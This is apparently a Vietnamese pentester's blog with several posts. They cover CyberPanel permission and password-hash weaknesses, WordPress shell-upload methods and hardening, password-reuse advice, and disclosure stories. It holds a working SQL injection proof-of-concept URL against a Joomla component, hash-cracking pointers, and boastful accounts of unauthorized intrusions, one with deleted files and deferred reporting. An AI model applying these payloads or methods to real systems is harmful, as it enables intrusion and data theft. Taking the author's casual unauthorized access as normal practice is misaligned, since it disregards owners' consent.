Thứ Năm, 21 tháng 3, 2019

Cyberpanel và những lỗ hổng bảo mật đã fix.

Tầm đầu tháng 1/2019 mình thấy đi group nào chuyên về thiết kế website, bán hosting,...Của facebook cũng có những comment khuyên nhau sử dụng Cyberpanel thay thế cho các Control Panel miễn phí, có phí để quản lý hosting...các thứ.

Thấy cũng tò mò nên mình có setup thử con VPS với Cyberpanel và tìm xem có gì hay ho không? Mục đích cũng để làm quen với nó cho biết với mọi người và kế đến là dòm ngó xem nó có gì hay hơn, dở hơn các panel khác không?

Mò mẫm thì thấy ngoài những cái mới, sài cũng lẹ hơn không ôm đồm, ỳ ạch  như VirtualMin, Webmin, VestaCP, KloxoMR, (đổi lại là thời gian phát triển của các panel trên lâu năm và an toàn hơn)...Nhưng tại thời điểm mình thử thì Cyberpanel tồn tại khá nhiều điểm yếu chết người về bảo mật, mình cũng report cho vendor những điểm yếu này đã được fix ở các version hiện tại.

Mình liệt kê ra một điểm yếu nhất, nguy hiểm nhất của Cyberpanel trước đây là ở mảng phân quyền những tập tin nhạy cảm của hệ thống (vd tập tin settings.py của Cyberpanel ) thật sự cẩu thả, cẩu thả đến mức chỉ cần các bạn có một user bất kỳ trên các server cài Cyberpanel thì các bạn có đủ quyền để nắm được:

- Tài khoản Root quản lý toàn bộ CSDL của hệ thống clients.
- Tài khoản root quản lý toàn bộ CSDL của hệ thống Cyberpanel

=> Vốn dĩ có tới tài khoản này là vì:
-  Cyberpanel sử dụng MariaDB để quản lý toàn bộ CSDL của các website trên hệ thống ở port:3306
-  Cyberpanel sử dụng MySQL để quản lý thông tin quản trị, domain, hosting, người dùng host, tài khoản FTP,.. ở Port:3307

Khỏi nói các bạn cũng có thể hình dung ra việc một người dùng nào đó mua host và có luôn quyền quản lý cái server đó của mình nó nguy hiểm ra sao rồi.

Ngoài trường hợp update hash:salt để chiếm quyền thì Mình cũng thử xem thuật toán mã hóa của các tài khoản hosting cũng như của admin trên Cyberpanel thì thấy khả năng có thể brute-force những hash password đó là khả thi nếu các bạn muốn có mật khẩu dạng text của target.

Thuật toán mã hóa nằm ở: https://github.com/usmannasir/cyberpanel/blob/v1.7.4/plogical/hashPassword.py

def hash_password(password):
    # uuid is used to generate a random number
    salt = uuid.uuid4().hex
    return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
.
Tức là chỉ cần có hash pass + salt thì có thể dùng hashcat với một option nhỏ để brute-force là: sha256($salt.$pass)

Đó chỉ là 1 trong những điểm yếu nguy hiểm nhất mà mình lấy để liệt kê ra đây làm ví dụ cho bài viết này, sau khi Cyberpanel đã fix nó, bằng cách phân quyền lại những tập tin có chứa những info nhạy cảm đó.

Kết luận:
- Cái gì mới ra và miễn phí thường không thật sự hoàn thiện và nó cần thời gian, cần đóng góp để hoàn thiện.
- Trước khi áp dụng công nghê hay công cụ nào đó cho hệ thống đang ổn định thì bạn nên kiểm thử nó xem có an toàn hay không.
- Hãy đóng góp cho nhà phát triển nếu bạn thấy những điểm yếu bảo mật nguy hiểm, có thể sẽ không có donate hay bounty đâu, nhưng nếu bạn thích thì hãy cứ làm thôi.

P/s: Mình trích lời của một người anh từng gởi cho mình: "Lòng tốt như thứ nước hoa quý. Có ai đem cho nó mà chẳng giữ được trên tay mình vài giọt thơm."

Thứ Tư, 13 tháng 3, 2019

Hướng dẫn bảo vệ website mã nguồn wordpress

Gần đây mình thấy khá nhiều bạn post bài bị hack, bị găm script, bị cài shell.... trong group WordPress Việt Nam và các group học lập trình khác, mình cũng muốn giúp các bạn nhưng tựu chung lại thì mình không thích trả lời đi, trả lời lại những câu hỏi mà mình đã gặp nên thôi.Hôm nay viết một bài về những hướng mà một hacker chiếm quyền website của các bạn, cách mà các hacker hay găm mã độc,...bằng chính kinh nghiệm thực tế mà mình từng sài sau bao nhiêu năm pentest :( (coi như mình tự bóp ... chính mình thôi, hơi đau xíu nhưng vẫn chịu được)


1. Mình hack các website sài mã nguồn wordpress ra sao?
2. Mình upload mã độc (shell) lên website bằng cách nào?
3. Những cách để hạn chế tối thiểu rủi ro?


Chi tiết các mục nè:

1. Mình hack các website sài mã nguồn wordpress ra sao?
Intro: Với một pentester, hacker,...Hay một người cù bất cù bơ muốn phá hoại thì hiển nhiên là họ sẽ tìm đủ mọi cách, tìm hết những điểm yếu, những sơ hở, sài lầm của victim có thể có và tận dụng nó để "thọt" cho victim thốn tới rốn mới tha và dưới đây là một vài hướng đi đó:

- Sài mã nguồn wordpress, themes, plugins cũ mà không chịu update thì hiển nhiên là có nhiều bugs, và đây là điểm yếu nhất vì có bugs thì có hàng vạn cách để tấn công chiếm quyền và phá hoại, đó là cái chung thứ nhất.

- Sài mã nguồn wordpress, themes, plugins share tràn lan trên mạng, ham rẻ, ham free, thì hiển nhiên đứa share nó cũng khuyến mãi thêm con shell, backdoor,... không ai cho không ai thứ gì, đó chính là hậu quả mà các bạn xứng đáng nhận chỉ vì tiếc ít tiền mua themes với plugins chính hãng.

- Cẩu thả trong việc quản lý website của chính các bạn, lấy ví dụ là site đang ổn định, các bạn sao lưu (backup) sau đó để nguyên cục source code đó với cái tên rất đáng yêu như public_html.zip, ten_domain.zip, backup.zip,...Tui scan ra được phát thì tui không download về tui cùi á =]]

- Sài chung mật khẩu cho tất cả =)) vấn đề này muôn thủa và không bao giờ hết đâu, nhiều bác sài có 1 cái mật khẩu cho toàn bộ hệ thống (Kể cả mấy Mod của group WordPress Việt Nam cũng được mình report cho fix vì lỗi này), từ acc admin, pass FTP, pass SSH, mail....lấy ví dụ nhẹ là tui download được source ở trên và "may mắn" thế là đàng hoàng login vào host các bạn thôi.

+ Bạn sài wordpress mới nhất, plugins và themes bản quyền cũng update mới nhất, có luôn mấy cái plugin bảo mật như ithemes,...Giấu luôn link wp-admin.Nhưng vẫn bị hack???

- Có thể bạn đang mắc những lỗi ở 2 gạch cuối phía trên cũng là nguyên nhân gây ra nguyên nhân nè.
- Có thể nơi bạn đang đặt mã nguồn của nhà cung cấp đó không nâng cấp hệ thống và bị chiếm cả con server thì bạn nằm trên đó có làm được gì khác nữa đâu.
- Update mới nhất thì đâu có nghĩa là mã nguồn nó an toàn và không có bugs đâu? mình tìm thấy 0day thì các bạn vẫn húp cháo như thường thôi.
- Cài càng nhiều themes, càng nhiều plugins thì càng tăng thêm rủi ro về bảo mật cho chính các bạn, cái nào cần thì cài thôi đừng có ôm hết vào, ôm rơm rặm bụng đấy.




2. Mình upload mã độc (shell) lên website bằng cách nào?
Intro: Bỏ qua hết các mục tìm lỗi, khai thác lỗi,... và đây là lúc mình có đủ info, đủ quyền để làm cái mình muốn làm với site của các bạn nè.


+ Theo lẽ thường thì mình sẽ upload bằng các hướng sau đây, đối với trường hợp vào được Dashboard nhé:

- Upshell dựa vào phần quản lý plugins: Phần này có thể dùng 2 cách như bên dưới.
-- Edit, chỉnh sửa nội dung source code của các plugins mà các bạn đang có sẵn, thay hay chèn thêm source shell của mình.
-- Upload luôn cái plugins mới lên và cài đặt như thường, tất nhiên trong cái plugins.zip đó có luôn mấy con shell của mình rồi.

- Upshell dựa vào phần quản lý Themes: Phần này cũng y như ở trên và có thể dùng 2 cách như bên dưới.
-- Edit, chỉnh sửa nội dung source code của các Themes mà các bạn đang có sẵn, thay hay chèn thêm source shell của mình.
-- Upload luôn cái Themes mới lên và cài đặt như thường, tất nhiên trong cái Themes.zip đó có luôn mấy con shell của mình rồi.

+ Phải luôn nhớ rằng KHÔNG NHẤT THIẾT cứ phải login được vào Dashboard mới upload được mã độc, upload được shell.
- Có nhiều lỗ hổng có thể trực tiếp execute command trên chính source code của các bạn, nếu website của bạn tồn tại lỗ hổng đó.
- Tính luôn tình huống bạn sài chung mật khẩu và mình vào thẳng FTP để làm việc mình cần làm luôn.
- Nên có thể đây là câu trả lời cho những bạn đã áp dụng cài plugin bảo mật, giấu link wp-admin,... vẫn bị hacker chơi ú à :(.


3. Những cách để hạn chế tối thiểu rủi ro?
Intro: Đây chỉ là những gợi ý mang tính tương đối dựa vào những cách thông thường mà các pentester, hacker hay sử dụng thôi, còn những tình huống đụng cao nhân thì đành chấp nhận build lại hệ thống thôi bạn.


+ Dựa vào những điểm thông thường mà mình viết ở mục 1 & 2 có thể đúc kết ra những hướng hạn chế như sau:

- Sài wordpress, themes, plugins, download trực tiếp từ trang chủ và mua bản quyền để hạn chế tối đa rủi ro bị găm mã độc.
- Luôn luôn update mã nguồn wordpress, themes, plugins đừng có chần chừ trì hoãn làm gì vì biết đâu hacker nó đã dòm ngó bạn từ lâu và khi có cơ hội là nó hốt bạn liền ngay trong đêm rồi.
- Đừng bao giờ sài mật khẩu dễ, sài chung mật khẩu, cái này nhắc hoài mà bà con dính hoài thôi và vẫn nhắc cho vui thôi haha.
- Đừng có cẩu thả khi quản lý và có cái tư tưởng kiểu... site mình có vẹo gì đâu mà lo, mình kỹ thế bố nó cũng méo hack được cần gì update,...Nhiều khi nó vào găm shell mấy tháng trước rồi mà bác không biết đấy :(

+ Riêng với wordpress mình gợi ý một vài hướng như sau để cải thiện thêm về bảo mật và hạn chế rủi ro ngoài những cách ở trên:

- Đơn giản là đặt cái mật khẩu để bảo vệ thư mục wp-admin/ không cần giấu hay đổi tên làm quỷ gì cho mệt, cách này coi như giảm được 90% bị upload shell rồi, mấy đứa gà gà thì không vào được Dashboard lấy gì mà upload được shell??? Còn vẫn bị upload shell thì coi như bạn xứng đáng vì được pro nào đó để ý và chết trong tay pro cũng không nhục mấy =]] Lúc này hãy xem log để tìm hiểu cái chết ra sao mà còn né nha.
- Rồi Chặn luôn tình huống lỡ xui bị nó mò được user - pass login ở cái wp-admin phía trên và vào được Dashboard thì sao? Vào wp-config.php thêm dòng này vào:

define( 'DISALLOW_FILE_EDIT', true );

Rồi save file lại, mục đích là để chặn, không cho chỉnh sửa hay upload themes, plugins. Không có chức năng này nữa thì lấy gì để hành động đây? Vào xong ngó ngó rồi đi ra thôi :(.

- Siêng thì làm thêm vài thao tác nữa về phân quyền cho thư mục, cho file, mục đích là để hacker không có quyền write shell lên nữa là ổn lắm rồi:
-- chmod 400 cho file quan trọng như wp-config.php.
-- chmod 701, 711 cho thư mục chưa source như public_html chẳng hạn.

- Cuối cùng là chọn mặt gởi vàng, kiếm một nhà cung cấp dịch vụ hosting, vps, server có uy tín với thương hiệu lâu năm, ít phốt mà trao thân gởi code để giảm thiểu rủi ro bị thông từ tầng hệ thống. Cái này thì dành cho 10% còn lại đó là các pro sài khà khà.

Hết.
P/s: Chúc các bạn may mắn =]]

Thứ Bảy, 22 tháng 12, 2018

Concobe và Anonyviet.com

Cách đây tầm đâu đó một vài tuần trở lại trong lúc lướt news feed của facebook thì thấy có vài bài viết của mấy em bên Anonyviet.com viết hiện lên. Thấy tinh thần làm việc của mấy em ấy cũng nghiêm túc và có đường hướng rõ ràng nên mình ngồi lại và...bắt đầu mình không nghiêm túc các bạn à :(

Sau vài phút dòm ngó sơ thì thấy mấy em sài mã nguồn wordpress cũng đổi link login mặc định vào Dashboard, cũng chặn connect từ ngoài vào một số cổng, đổi luôn port các dịch vụ phổ biến như SSH,...Thấy có vẻ cũng khó mà thực hiện ý đồ đen tối rồi.

Đang phút bối rối thì mình chợt nghĩ đến mấy cái lỗi phổ biến mà khá nhiều các bạn admin khác hay bị đó là biết đâu sẽ có thêm chút info nếu scan thử với cái tools cùi cùi của mình để xem có thông tin nào mới hơn như phpinfo hay backup source, backup database,...shell, nói chung qua bước thử vận may rồi khà khà.

Mới chạy được xíu thì nó báo là phát hiện thấy có file có thông tin về phpinfo, đang vui vui được chút, click chuột vào xem có thông tin nào hấp dẫn không thì lại tiếp tục tụt cảm xúc với mấy cái thông số chính như.

- Version của các thành phần chính chạy webserver toàn hàng update mới nhất:
- PHP Version 7.1.17
- nginx/1.14.0
- Mysql cũng mới nốt, rồi còn cái đáng quan tâm nhất là kernel cũng lại là hàng mới nốt.
- Linux server155 2.6.32-696.23.1.el6.x86_64 #1 SMP Tue Mar 13 22:44:18 UTC 2018 x86_64

Thấy có vẻ cũng khó nhai thật sự vì mấy em ấy cũng cẩn thận và chăm chút cho hệ thống của các em ấy nghiêm túc, đang tính bỏ cuộc không làm điều xấu nữa thì ... lại thấy cái cần thấy ở cái tool scan của mình.
- /anonyviet.com.tar.gz

Hơi khó tin chút xíu vì từ đầu tới giờ mình thấy khả năng tồn tại lỗi này gần như là khó có thể xảy ra nhưng thực tế thì nó lại đang tồn tại (sad but true).

Download thử lại bất ngờ lần nữa, cái file thì lớn bà cố hơn 5gb luôn sau khi download xong thì vào extract ra và lại gom info, gần như tất cả đều là info mới và còn sử dụng được bao gồm cả info để kết nối vào database anonyviet.com

Cười thầm cái, quả này thì chắc kèo mấy em anonyviet bị Cò mổ rồi :D.

Lại thêm một lần thất bại vì không thể tìm được cách để connect vào database của website các em ấy đang chạy. Quá cẩn thận.

Thôi thì lại móc thêm chút info của các admin trong database đã backup cùng với source code đó để quăng vào brute-force quay tay tìm vận may nhưng lần này nó vẫn không chịu mỉm cười với mình. Các em sài mật khẩu quá tốt và qua được ải.

Vào nghía lại source thì thấy có cái thư mục chứa hàng tá các tools, code liên quan về hacking, có lẽ của mấy em ấy sưu tầm trong quá trình đi check hoặc đó là nguồn tư liệu để dùng demo cho các bài viết trên website.

Mình mới bắt đầu đi vào quá trình "white box penetration testing" chứ nãy giờ black box nó nhọ quá rồi hu hu. Cũng thấy khá nhiều lỗi ở khá nhiều tool trên đó nhưng nó vẫn chưa làm mình thấy thỏa mãn, mình xem tiếp và vô tình tìm được một cái tool có chứa backdoor là một cái form upload của ai đó.

Thôi thì sài ké luôn cho lẹ vậy, thế là đã kết thúc quá trình "không nghiêm túc" của mình bằng file: /checked.txt trên site của các em và tới hôm nay mới có thời gian viết bài để gởi cho mấy em.
- /checked.txt

Kết luận:
- Sau khi download xong thì không biết có phải các em ấy phát hiện hay là do vô tình mình may mắn vào ngay lúc các em đang backup hệ thống thường kỳ hay không.Nhưng file backup đã được xóa rất nhanh.
- Toàn bộ mọi thông tin, thao tác và quản lý các em ấy đều rất cẩn thận, đây là điểm mạnh mà mình thấy rất vui khi ... mò mẫm hệ thống của các em ấy.
- Tóm lại lần này khả năng cao là mình may mắn vì vừa có source, vừa có database lại có thêm form upload trong đống tools mà các em ấy tổng hợp nên mới vào được.

Cách Fix:
- File backup đã xóa rồi, nhưng sau này khi backup nhớ để nó ở ngoài thư mục documents root với cái tên rất dễ đoán, rất gần gũi nha. Nếu muốn backup về localhost thì nên dùng ftp hay sftp cho an toàn.
- Xóa hết cái mớ source không liên quan kia đi, kẻo lại cõng rắn cắn gà nhà như vừa rồi.
- Đổi lại toàn bộ thông tin liên quan đến các tài khoản của quản trị như tài khoản các author, mod, admin, tài khoản kết nối database, ftp, ssh,...Cẩn tắc vô áy náy.
- Chúc các em giữ vững phong độ và ngày càng có nhiều bài viết hay về mảng bảo mật cũng như tin tức, thủ thuật cho các bạn tham khảo, học tập theo.





P/s: Mấy bác có đọc xong bài này thì đừng có scan hay thử vận may nữa, mình report cho các em ấy fix hết rồi mới public đấy.

Thứ Sáu, 14 tháng 12, 2018

Lợi và hại khi dùng chung mật khẩu cho tất cả.

Bài viết này mình chỉ để cập vấn đề sử dụng chung mật khẩu cho dịch vụ web app, tức là dành cho những người quản trị nào đang quản lý số lượng lớn website mà thôi.

Xuyên suốt quá trình pentest thì có không ít lần mình đụng phải những hệ thống của một số admin quản lý cả chục, cả trăm website cùng một lúc, đây thường là của những bạn, cty làm về các mảng sau:

- Thiết kế website.
- Dịch vụ SEO cho khách hàng.
- Dựng hệ thống site để kiếm tiền quảng cáo.
- ...




1. Thường thì với những tình huống này đa phần các bạn admin sử dụng chung thông tin đăng nhập cho toàn bộ các website của họ và đối với tình huống này sẽ có một số tiện dụng và bất cập như sau:
- Dùng chung mật khẩu cho toàn bộ website thì sẽ không phải tốn công nhớ, quản trị mật khẩu mà chỉ cần nhớ một username, một password là sài được hết.
- Bất cập là nếu như vì lý do nào đó bị lộ mật khẩu đó thì coi như toàn bộ website thuộc hệ thống sẽ lên đường đi thỉnh kinh, nếu gặp bad guy.

2. Trường hợp tiếp theo là sử dụng cùng tên đăng nhập nhưng có thay đổi mật khẩu khác nhau ở số ít.
- Cách này cũng có lợi ở việc dễ nhớ và quản lý của các admin với số lượng lớn website phải quản trị và cũng hạn chế được phần nào mức độ ảnh hưởng khi bị lộ mật khẩu nào đó.
- Với hướng này thì cũng tồn tại bất cập ở việc quản lý ở số lượng website lớn, nếu không gom nhóm hay tổ chức bài bản thì sẽ rất rối và tốn thời gian vì có thể phải đăng nhập sai password vài lần.

3. Với tình huống cuối mà mình cũng từng gặp đó là sử dụng một công cụ để quản lý chung cho một số website theo nhóm.
- Cái này nó cũng giống như ở phần 1. nhưng nó được đầu tư có bài bản và được gom nhóm lại rất tiện cho người quản lý, chỉ cần đăng nhập vào tài khoản quản trị chính thì có quyền quản lý một số website nhất định.
- Cách này cũng tương tự như hai phần trên là nếu lộ thì cũng chết, nhưng hạn chế được rủi ro ít hơn và dễ khoanh vùng, khắc phục hơn phần 1 và phần 2.

4. Kết luận:  Để hạn chế rủi ro và tiện cho việc khắc phục hậu quả thì mình có vài lời khuyên chung như sau:
- Nên dùng công cụ, hệ thống để quản lý tập trung các website mà các bạn đang quản trị lại.
- Mỗi tài khoản chỉ được quản lý tầm 10 website thôi cho an toàn và rất dễ khoanh vùng, khắc phục khi bị tấn công hàng loạt.
- Khi đã áp dụng công cụ quản lý tập trung và rõ ràng thế thì nên áp dụng luôn cách ở phần 2 đó là sài riêng tên đăng nhập và mật khẩu cho các tài khoản quản trị đó.
- Đó chỉ là một vài hướng gợi ý để giúp các bạn quản lý và lên kế hoạch phát triển với dễ khắc phục khi bị tấn công.


P/s: Quan trọng nhất đó là hàng tháng nên thắp nhang cúng đều đặn để cầu mong sự bình an nha các admin. =]]

Thứ Tư, 8 tháng 11, 2017

Lỗ hổng toàn bộ hệ thống zipo.vn và trách nhiệm.

Hôm rồi tôi có phát hiện một lỗ hổng trên website chính của một cty thiết kế website khá lớn ngoài Hà Nội cho phép tôi có thể bypass các rào cản và upload trực tiếp mã độc lên thẳng server không cần phải qua bất kỳ bước xác thực nào, một lỗ hổng vô cùng nguy hiểm.

Sau đó tôi có thu thập thêm một chút info về các khách hàng của bên zipo.vn đã từng thiết kế và vẫn đang quản lý các website này thì phát hiện ra rằng tất cả những website của khách hàng cũng tồn tại chung một lỗ hổng tương tự, tới đây các bạn thử nghĩ rằng nếu tôi bắt đầu phá hoại thì thiệt hại cho cty này sẽ là không thể đong đếm được.



Hoặc nếu tôi âm thầm upload mã độc lên toàn bộ hơn 200 website này và rao bán cho các bên làm về SEO thì khả năng những site đó sẽ rớt hạng thê thảm và cty đó chắc chắn sẽ phải mất rất rất nhiều thời gian để khắc phục nó, đó chỉ là khăc phục tạm thời về mặt kỹ thuật, còn về uy tín và ảnh hưởng tới khách hàng của họ thì khả năng cao là sẽ mất khá nhiều khách hàng thậm chí nếu thiệt hại quá lớn có khả năng phá sản.

Nhưng như các bạn thường thấy thì tôi không có ý định phá hoại, tôi soạn một email thông báo về lỗ hổng và gởi cho admin cũng là người đang vận hành toàn bộ hơn 200 website này, cũng rất nhanh tôi nhận lại được email hồi âm với tinh thần trách nhiệm cao, sau đó tôi trao đổi các chi tiết lỗ hổng để bạn admin ấy nắm và tiến hành vá lỗi.

Thường thì theo kinh nghiệm của tôi thấy khi gởi cảnh báo cho các cty, hay tổ chức trước đây sẽ luôn có
- Một số bên im lặng và âm thầm vá lỗi, không một lời cảm ơn.
- Một số thì cũng rất nhanh gởi hồi âm và để đó, không vá lỗi, bỏ mặc cho khách hàng của họ muốn ra sao thì ra.
- Cũng có người hù dọa này nọ nhưng số này không đáng kể.
- Cũng có một số cá nhân reply, fix bug, cảm ơn, cũng có người donate rất hậu hĩnh, cũng có bên chỉ hứa hão, vấn đề này thường thì tôi không xem nó quan trọng.
- Và cũng có những người có tinh thần trách nhiệm rất cao, họ reply rất đàng hoàng, luôn kèm theo lời cảm ơn, dồn toàn bộ sức lực để vá lỗi cho toàn hệ thống của họ như bên zipo.vn.

Tôi thật sự đánh giá rất cao tinh thần trách nhiệm của các bạn bên zipo.vn, hơn 200 website khách hàng đã được vá lỗ hổng trong một ngày, đó là điều tuyệt vời mà tôi phải chia sẻ để các admin, các giám đốc, các admin kỹ thuật của các cty, tổ chức khác nên tham khảo và làm theo.Vì đó là quyền lợi cũng như trách nhiệm của chính các bạn.

Chúc cty các bạn ngày càng có nhiều khách hàng và luôn giữ được tinh thần trách nhiệm cũng như cái tâm của nghề nghiệp.

Concobe

Thứ Ba, 17 tháng 10, 2017

Case cũ nhàm chán, áp dụng vẫn thành công với victim lớn.

Case này trước đây mình cũng từng nhiều lần nhắc đến và có hẳn một bài nêu ra những mối nguy hại khi mắc phải cái lỗi ngớ ngẩn này, chỉ tiếc rằng hiện nay vẫn còn rất rất nhiều quản trị viên của các cty, tổ chức, hệ thống,... chưa thật sự chú trọng nó.

Mình tính không viết bài này ra nhưng tại victim này mình me cũng tính với thời gian bằng năm rồi nên khoe hàng khoe họ xíu thôi chứ chả có gì hứng thú vào thời điểm thông quan victim này nữa.

Hôm đó ngứa tay về lại victim xưa khi thấy có mẩu tin tức thông báo của họ trên facebook, ngồi nghịch nghịch lại xíu cũng không thu hoạch được gì mới, toàn những info cũ mà trước đây mình đã có rồi, tính tắt mấy cai tab trình duyệt đi thì chợt thoáng qua cái Path của thư mục chứa source code victim đó, bỗng dưng thấy có gì đó vui vui nên mình quăng vào tools, random thêm một số tên file dựa vào cái path đó và scan thử, nào ngờ nó found tới 2 kết quả của cái lỗi backup file và để đó.




Ngồi cười nhẹ cái, click link và download file backup đó về, tưởng ít ai ngờ nó nhiều bà cố file tới ~12Gb, thôi ráng động viên tinh thần và để đó cho nó download về máy xong cũng hết 3 tiếng cuộc đời với cái mạng lởm của mình.

Bắt đầu ngồi gom info từ cái đống đó, nó là bản backup của toàn bộ mã nguồn, vài cái database của hệ thống đang chạy hiện tại, thấy cũng vui vui vì có thông tin kết nối vào database của hệ thống đó.Nhưng khi thử kết nối thì lại không được, do server không cho phép kết nối từ ngoài vào, thế là lại lò mò whitebox cái đống source tự code tìm bug, sau một thời gian thì cũng tìm dc cái... cần thiết để chiếm quyền và không phụ lòng mò mẫm nó đã thành công, chiếm quyền thành công.

Vào cũng không thấy hấp dẫn gì mấy vì những thứ trên server đều nằm hết trong file backup đã download về máy rồi nên dạo dạo xíu rồi xóa hàng, kết thúc quá trình phiêu lưu ký.

Sẽ report vào một ngày đẹp trời vì thật sự với victim này mình không có hứng thú và thiện cảm mấy.Kết thúc bài chém gió vào một đêm mưa.

Thứ Tư, 11 tháng 10, 2017

An toàn thông tin và cái giá.

Sống trong thời buổi loạn lạc, thông tin là thứ quyết định gần như mọi chuyện nhưng tiếc rằng một số cá nhân vẫn chưa nhận ra điều này, cũng có những cá nhân vẫn đang xem thường sự quan trọng của nó, để đến khi đụng chuyện thì mới ngã ngửa rồi nhận ra rằng mọi thứ đã quá trễ để cứu vãn.




- Một công ty để lộ thông tin nhân viên hay những chiến lược kinh doanh thì khả năng công ty đó sẽ gặp nhiều sóng gió và tệ hại nhất sẽ là phá sản.
- Một tổ chức bí mật nếu lộ thông tin sẽ ảnh hưởng đến toàn bộ các thành viên của tổ chức, thậm chí những người liên quan cũng bị ảnh hưởng.
- Một trường học để lộ thông tin học sinh, sinh viên sẽ có nhiều em có thể bị gây hại hoặc cha mẹ bị lừa đảo tống tiền,...
- Một hệ thống website, máy chủ,... bị lộ thông tin nhảy cảm sẽ gây tổn thất nặng nề cho người sở hữu nó.
- ...

Hãy chủ động giữ an toàn cho chính mình, đừng để mất bò mới lo làm chuồng.

 Concobe

Thứ Năm, 28 tháng 9, 2017

Lỗ hổng toàn hệ thống website của vntdc.com


Note: Bận bịu quá nên mình copy luôn nội dung cái email  đã soạn để report cho bên cty web, đồng thời cũng ẩn đi một số thông tin nhạy cảm, theo mình biết thì bên cty sau khi nhận được email report đã tiến hành vá những lỗi nguy hiểm rất nhanh và triệt để, chỉ có điều hơi buồn là không ai reply lại cho mình cả.

Hôm qua mình có thấy một vài thông tin về mật khẩu của các bạn xuất hiện trên một diễn đàn chuyên brute-force hash do một thành viên của một team hack ở nước ngoài post lên với mục đích nhờ hỗ trợ brute-force và họ đã có rất nhiều kết quả được brute-force ra, qua đó mình cũng nhận biết được đây chính là những mật khẩu của website khách hàng mà các bạn đang sử dụng.

link: (...Hide...)

Trong cùng ngày 28/08/2017 thì mình quan sát đã thấy nhóm hacker này đã chiếm được toàn bộ những website mà cty các bạn đang sở hữu và upload file deface lên các site này sau đó tiến hành show off ở trang web chuyên dùng để khoe thành tích của các nhóm hacker trên thế giới.

link: http://zone-h.org/archive/notifier=black_raptor/page=1

Theo những thông tin mình nắm được thì mình có pentest thêm theo phán đoán của mình và phát hiện ra rằng hệ thống của các bạn đang tồn tại khá nhiều lỗ hổng nguy hiểm.

1. Lỗ hổng SQL Injection trên toàn bộ các website sài mã nguồn Joomla.
2. Sài chung mật khẩu cho toàn bộ tài khoản có quyền quản trị cao nhất.
3. Sài chung mật khẩu tài khoản FTP cho gần như toàn bộ hosting.


Chi tiết các lỗ hổng:

1. Lỗ hổng SQL Injection trên toàn bộ các website sài mã nguồn Joomla.

Exploit: /?option=com_vnmshop&catid=[SQLi]&Itemid=211
Poc: /?option=com_vnmshop&catid=-110 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat(user(),0x3a,version(),0x3a,database()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -&Itemid=211

Info: (...Hide...)

Từ những thông tin lỗ hổng này mình có thể select ra những thông tin nhạy cảm của admin và tiến hành brute-force để chiếm quyền quản trị của website các bạn đang có, giống như cách mà nhóm hacker kia đã sử dụng để tấn công hệ thống các bạn, qua đó mình có được những thông tin quan trọng ở mục 2 và 3 bên dưới

2. Sài chung mật khẩu cho toàn bộ tài khoản có quyền quản trị cao nhất.
(...Hide...)
3.Sài chung mật khẩu tài khoản FTP cho gần như toàn bộ hosting.
(...Hide...)

Lời khuyên:
- Rà soát lại toàn bộ mã nguồn của những website bị hack để tìm ra lỗ hổng khác, hoặc mã độc đã bị các hacker đó upload lên.
- Các bạn nhanh chóng fix lỗi SQLi cho toàn bộ các website mà các bạn sử dụng mã nguồn này.
- Thay đổi lại toàn bộ mật khẩu mà các bạn đang sử dụng, từ tài khoản admin tới các hostting.
- Xóa hết những tập tin deface của hacker đó upload trên hệ hống các bạn file tên: id.html dựa theo danh sách mà nhóm đó đã show off trên zone-h
- Nên update mã nguồn lên các version mới hơn, hoặc gia cố bảo mật thêm cho các website của khách hàng vd như: Đặt thêm mật khẩu bảo vệ cho thư mục /administrator/ dù nó dễ nhưng là rào cản lớn nhất cho các hacker không thể đăng nhập vào dashboard để upload mã độc và chiếm toàn quyền được.

Kết luận:
- Do mã nguồn và module các bạn code và sử dụng tồn tại lỗ hổng nguy hiểm SQLi nên đã bị hacker nước ngoài tấn công chiếm quyền.
- Thói quen sử dụng chung mật khẩu cho toàn bộ hệ thống là điều rất nguy hiểm, nhất là việc áp dụng cho toàn bộ site của khách hàng.
- Cũng rất may mắn là nhóm hacker này không thay đổi file index.php của các website mà chỉ tạo thêm file id.htm để show off, nếu không thì thiệt hại về uy tín của cty các bạn sẽ không thể đo đếm được.
- Hãy tranh thủ fix lỗ hổng càng sớm càng tốt, thay đổi mật khẩu, thêm pass bảo vệ administrator, và xóa hết những tập tin mà nhóm hacker đó để lại để tránh bị google cho site các bạn vào danh sách nguy hiểm, sẽ vô cùng phiền phức.

Concobe

Thứ Ba, 18 tháng 7, 2017

Cảm ơn BQT mmo4me.com

Chuyện xảy ra cũng rất lâu rồi hôm nay mới kể lại hì hì, số là trong một đợt tình cờ dạo trên facebook thấy có vài bài chia sẻ của các bạn của mình về diễn đàn mmo4me.com nên cũng tò mò vào xem, rồi cũng ngứa tay nên pentest thử ai ngờ tìm được vài lỗ hổng chà bá lửa.

1. SQL injection
2. Dùng user Root có full quyền quản trị Database.


Hai cái 1,2 này mà đi chung với nhau thì thật là hạnh phúc vô cùng các bạn à, ngồi select thêm vài thông tin để có cái gởi cho admin để các bạn ấy fix sớm cho khỏe, cũng có trục trặc chút xíu vì email mình gởi là email lấy trong db ra nhưng tiếc là nó không còn hữu dụng nữa, đành liên hệ qua facebook luôn, gởi thêm thông tin vào email của admin đã cho khi liên hệ trên facebook.

Rất nhanh sau đó, các bạn admin mmo4me.com đã tiến hành vá lỗ hổng và reply lại, mình cũng check lại và confirm bug đã được vá an toàn.Hai bên cũng chém gió vài thứ và chia tay, hôm sau mình nhận được một khoản donate nho nhỏ của các admin mmo4me.com, thấy vui vui hì hì.Nay mưa gió bão bùng vô tình đọc lại email nên viết vài dòng lưu dấu răng :D.




P/s: Còn rất rất nhiều những lời cảm ơn với những nhà hảo tâm đã donate khi mình gởi thông báo lỗi nhưng không thể viết lên đây hết được, xin cảm ơn các bạn, các anh chị rất nhiều.

Chủ Nhật, 16 tháng 7, 2017

Sổ tử

Đây có lẽ là một project mà tôi (Concobe) đã cất công xây dựng nên trong một khoảng thời gian không hề ngắn, với công sức bỏ ra cũng không hề nhỏ có thể nói nó được tính bằng năm chứ không còn là vài tháng nữa.



